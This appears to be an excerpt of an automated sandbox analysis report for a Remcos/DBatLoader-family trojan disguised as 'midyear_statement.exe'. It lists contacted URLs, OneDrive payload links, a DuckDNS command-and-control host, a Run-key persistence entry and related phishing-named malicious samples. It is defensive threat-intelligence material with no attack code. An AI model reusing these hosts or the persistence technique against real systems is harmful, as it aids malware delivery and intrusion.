                      http://www.nirsoft.net | wkrriuhD.pif, 0000001B.00000002.1406015576.0000000000193000.00000004.00000010.00020000.00000000.sdmp | false | | high
                      https://aefd.nelreports.net/api/report?cat=bingaotak | bhv348F.tmp.27.dr | false | URL Reputation: safe | unknown
                      https://deff.nelreports.net/api/report?cat=msn | bhv348F.tmp.27.dr | false | URL Reputation: safe | unknown
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05 | bhv348F.tmp.27.dr | false | Avira URL Cloud: safe | unknown
                      https://abpoxw.sn.files.1drv.com/y4mVdi6rp2qkaaDX5Txipl4hmgaKma0en0K10OdbofbDqqNgddkNvfFr34Mxc3bQcF3 | Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://abqscw.sn.files.1drv.com/ | Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://onedrive.live.com/ | Dhuirrkw.PIF, 00000020.00000002.1638568341.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey= | Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp | false | | high
                      https://www.google.com | wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                      https://abpoxw.sn.files.1drv.com/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJVsre | Dhuirrkw.PIF, 0000001E.00000002.1567523437.00000000007E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb | bhv348F.tmp.27.dr | false | Avira URL Cloud: safe | unknown
                      http://geoplugin.net/json.gp/C | wkrriuhD.pif, 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp | true | URL Reputation: phishing | unknown
                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhv348F.tmp.27.dr | false | URL Reputation: safe | unknown
                      https://live.com/ | midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://login.yahoo.com/config/login | wkrriuhD.pif | false | | high
                      https://abpoxw.sn.files.1drv.com:443/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1y | midyear_statement.exe, 00000000.00000003.1292113599.0000000000907000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://www.nirsoft.net/ | wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                      https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey= | Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://aborlw.sn.files.1drv.com/y4mhPCChdz-WmirIkiDV2ww7X8Bbd2o2c6Warvjl_dk_jMmN6VWuryzdoRm3kPHX80_ | Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616710283.000000000083A000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://onedrive.live.co | Dhuirrkw.PIF, 00000020.00000002.1638568341.0000000000808000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                                                            https://aborlw.sn.files.1drv.com/midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv348F.tmp.27.drfalse
                                                                                high
                                                                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://abqscw.sn.files.1drv.com/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX-g6MDhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.office.com/bhv348F.tmp.27.drfalse
                                                                                    high
                                                                                    https://live.com/WDhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://sectigo.com/CPS0midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://live.com/XDhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://geoplugin.net/json.gplwkrriuhD.pif, 00000018.00000003.1379033633.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1622995189.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://abpoxw.sn.files.1drv.com:443/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJDhuirrkw.PIF, 0000001E.00000003.1564727013.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.imvu.comwkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://abpoxw.sn.files.1drv.com/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cd0KwDhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://aefd.nelreports.net/api/report?cat=wsbbhv348F.tmp.27.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://aborlw.sn.files.1drv.com/oDhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.imvu.comppDatawkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv348F.tmp.27.drfalse
                                                                                                  high
                                                                                                  https://abqscw.sn.files.1drv.com:443/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCXDhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58bhv348F.tmp.27.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://geoplugin.net/json.gpSystem32wkrriuhD.pif, 00000018.00000003.1379033633.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.0000000012491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://aborlw.sn.files.1drv.com/y4mLOg16uNX2Id3t-nfFLVYL7CZhAgTRemSr1q_NX-Mvx_fpOOS9Dz7js9NACEXeYp5Dhuirrkw.PIF, 0000001E.00000003.1545101196.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://geoplugin.net/wkrriuhD.pif, 00000018.00000003.1379033633.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://aefd.nelreports.net/api/report?cat=bingaotbhv348F.tmp.27.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://aborlw.sn.files.1drv.com/y4mXBt2sSJKJZHlLzI8sH3PFmgRqsPoY_FaTasOJSi4WNTk8bd6AgZ1TzwzQWZ2uDijDhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://aefd.nelreports.net/api/report?cat=bingrmsbhv348F.tmp.27.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://live.com/aDhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.google.com/accounts/serviceloginwkrriuhD.piffalse
                                                                                                              high
                                                                                                              https://live.com/gmidyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://abpoxw.sn.files.1drv.com/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1yWLZHmidyear_statement.exe, 00000000.00000002.1380482770.0000000015BD6000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1292113599.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://abpoxw.sn.files.1drv.com/midyear_statement.exe, 00000000.00000003.1292113599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.pmail.commidyear_statement.exe, midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, wkrriuhD.pif, 00000018.00000000.1358434050.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001B.00000000.1383271733.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001C.00000000.1383573996.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001D.00000000.1384411850.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001F.00000002.1566764474.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 00000021.00000000.1636440948.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif.0.drfalse
                                                                                                                      high
                                                                                                                      http://ocsp.sectigo.com0Cmidyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.ebuddy.comwkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.139.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
192.3.109.132 | www.zuckdgreb.duckdns.org | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1417015
Start date and time: 2024-03-28 13:58:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: midyear_statement.exe
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winEXE@39/16@7/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 98
• Number of non-executed functions: 207
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
13:58:57 | API Interceptor | 1x Sleep call for process: midyear_statement.exe modified
13:59:10 | API Interceptor | 24x Sleep call for process: powershell.exe modified
13:59:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dhuirrkw C:\Users\Public\Dhuirrkw.url
15:41:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dhuirrkw C:\Users\Public\Dhuirrkw.url
15:41:08 | API Interceptor | 2x Sleep call for process: Dhuirrkw.PIF modified
15:41:28 | API Interceptor | 6120056x Sleep call for process: wkrriuhD.pif modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.107.139.11 | ENQUNION096424 CLOSING DATE URGENT.bat | malicious | Remcos, DBatLoader |
13.107.139.11 | https://1drv.ms/o/s!Aks-7t91vov6sE-66HewIX77qIuB?e=wdAigZ | malicious | SharepointPhisher |
13.107.139.11 | Statement Of Account - Overdue Payments #94839540823489.bat | malicious | Remcos, DBatLoader |
13.107.139.11 | SecuriteInfo.com.Win32.Evo-gen.7105.24636.exe | malicious | Remcos, DBatLoader |
13.107.139.11 | PRODUCTS.bat | malicious | Remcos, DBatLoader |
13.107.139.11 | SecuriteInfo.com.Variant.MSILHeracles.154798.18921.25285.exe | malicious | Unknown |
13.107.139.11 | Zam#U00f3wienie_5210000045542300.cmd | malicious | DBatLoader, Remcos |
13.107.139.11 | RFQ#30091.CMD.cmd | malicious | DBatLoader |
13.107.139.11 | Returned Swift Copy of Payment #475479.bat | malicious | DBatLoader |
13.107.139.11 | Returned Swift Copy of Payment #475479.bat | malicious | DBatLoader |
192.3.109.132 | repeatorder.exe | malicious | Remcos, DBatLoader |
192.3.109.132 | product_order.cmd | malicious | Remcos, DBatLoader |
192.3.109.132 | conditional_order.cmd | malicious | Remcos, DBatLoader |
178.237.33.50 | awb_shipping_documents_27_03_2024_0000000000.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | DHL TAX INVOICES - MARCH 2024.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
                                                                                                                                                Statement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                z1awb_shipping_documents_27_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                awb_shipping_documents_26_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                Order P.O26_3_24.CommonWealth.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.zuckdgreb.duckdns.org | repeatorder.exe | malicious | Remcos, DBatLoader | 192.3.109.132
dual-spov-0006.spov-msedge.net | 101206 - 24595 - Nymc - 401K - Audit - Change Report 9(Rev) + 10 + 11 + 12-882755.docx | malicious | Unknown | 13.107.137.11
dual-spov-0006.spov-msedge.net | Inquiry_GMD_Specifications_7266738879_G#2024.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.137.11
dual-spov-0006.spov-msedge.net | ENQUNION096424 CLOSING DATE URGENT.bat | malicious | Remcos, DBatLoader | 13.107.139.11
dual-spov-0006.spov-msedge.net | https://1drv.ms/o/s!BFRjM-vQxGYFhElDOX-pd0RkvatP?e=Rp2e0wqCfEOklCep72qfVw&at=9&d=DwMFAw | malicious | HtmlDropper, HTMLPhisher | 13.107.137.11
dual-spov-0006.spov-msedge.net | https://1drv.ms/o/s!Aks-7t91vov6sE-66HewIX77qIuB?e=wdAigZ | malicious | SharepointPhisher | 13.107.139.11
dual-spov-0006.spov-msedge.net | Yeni sifaris siyahisi.exe | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | https://1drv.ms/o/s!Aks-7t91vov6sCpKk2puy8xtGsHV?e=AsvnyK | malicious | SharepointPhisher | 13.107.137.11
dual-spov-0006.spov-msedge.net | Order inquiry.bat | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | https://sharepoint-8sw.pages.dev/ | malicious | HTMLPhisher | 13.107.137.11
dual-spov-0006.spov-msedge.net | Statement Of Account - Overdue Payments #94839540823489.bat | malicious | Remcos, DBatLoader | 13.107.139.11
geoplugin.net | awb_shipping_documents_27_03_2024_0000000000.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | DHL TAX INVOICES - MARCH 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Statement of Account for Past Due Invoices.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | z1awb_shipping_documents_27_03_2024_000000000.vbs | malicious | FormBook, GuLoader, Remcos | 178.237.33.50
geoplugin.net | ENQUNION096424 CLOSING DATE URGENT.bat | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | 3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PI-BD2403001.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | awb_shipping_documents_26_03_2024_000000000.vbs | malicious | FormBook, GuLoader, Remcos | 178.237.33.50
geoplugin.net | Order P.O26_3_24.CommonWealth.pdf.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | Statement of Account for Past Due Invoices.exe | malicious | Remcos | 192.210.201.57
AS-COLOCROSSINGUS | RFQ No. 5490490.xla.xlsx | malicious | Unknown | 107.175.113.216
AS-COLOCROSSINGUS | ENQUNION096424 CLOSING DATE URGENT.bat | malicious | Remcos, DBatLoader | 192.3.216.131
AS-COLOCROSSINGUS | https://62.172-245-112-195.cprapid.com/PayPaI/IP: | malicious | Unknown | 172.245.112.195
AS-COLOCROSSINGUS | PO_OCF 408.xls | malicious | Unknown | 198.46.173.145
AS-COLOCROSSINGUS | PI-BD2403001.exe | malicious | Remcos, DBatLoader | 23.95.235.29
AS-COLOCROSSINGUS | 36KV XLPE Materials-300mm.xlam.xlsx | malicious | AgentTesla | 192.210.215.35
AS-COLOCROSSINGUS | 1.xla.xlsx | malicious | Unknown | 107.175.113.216
AS-COLOCROSSINGUS | MICROSOFT_OFFICE_EXCEL_A.vbs | malicious | Unknown | 205.234.157.226
AS-COLOCROSSINGUS | po3495954.xls | malicious | Unknown | 198.46.173.145
ATOM86-ASATOM86NL | awb_shipping_documents_27_03_2024_0000000000.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbs | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | DHL TAX INVOICES - MARCH 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | Statement of Account for Past Due Invoices.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | z1awb_shipping_documents_27_03_2024_000000000.vbs | malicious | FormBook, GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | ENQUNION096424 CLOSING DATE URGENT.bat | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | 3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | PI-BD2403001.exe | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | awb_shipping_documents_26_03_2024_000000000.vbs | malicious | FormBook, GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Order P.O26_3_24.CommonWealth.pdf.exe | malicious | Remcos | 178.237.33.50
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://colourlyrics.com/fe/KtHc5ruvtRkZFoArrtthaJsvCmg3Rb7X4JToP666Ry87hz3e3rFuRJGAPKBcoBZjAZJZK4pouqXoieozb8x97ijrpxmdxNfsxaBCR2nGFdZnrhtCVLagarbeJ5bjm2rcgeCmZPnkCo2NqoSFB3o6MQ | malicious | Unknown | 13.107.246.51
MICROSOFT-CORP-MSN-AS-BLOCKUS | FindAll.xla | malicious | Unknown | 13.107.246.40
MICROSOFT-CORP-MSN-AS-BLOCKUS | http://avsvmcloud.com | malicious | Unknown | 20.140.0.1
MICROSOFT-CORP-MSN-AS-BLOCKUS | 11111.lnk | malicious | Unknown | 13.107.246.40
MICROSOFT-CORP-MSN-AS-BLOCKUS | AhbJkpk3Z8.elf | malicious | Unknown | 20.167.146.117
MICROSOFT-CORP-MSN-AS-BLOCKUS | dysrvPhMb0.elf | malicious | Mirai | 20.48.73.233
MICROSOFT-CORP-MSN-AS-BLOCKUS | 66yaYNheLa.elf | malicious | Unknown | 13.80.73.249
MICROSOFT-CORP-MSN-AS-BLOCKUS | XCSBsTmkde.elf | malicious | Mirai | 20.124.86.140
MICROSOFT-CORP-MSN-AS-BLOCKUS | CGlwOBF2cH.elf | malicious | Unknown | 104.40.77.22
MICROSOFT-CORP-MSN-AS-BLOCKUS | lYMzLERz9v.elf | malicious | Unknown | 191.237.178.54
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | QJwM0vJ5mk.exe | malicious | LummaC | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | mUY60MPRcJ.exe | malicious | LummaC | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | FindAll.xla | malicious | Unknown | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | 11111.lnk | malicious | Unknown | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | 0u4INeEGGS.exe | malicious | LummaC | 13.107.139.11
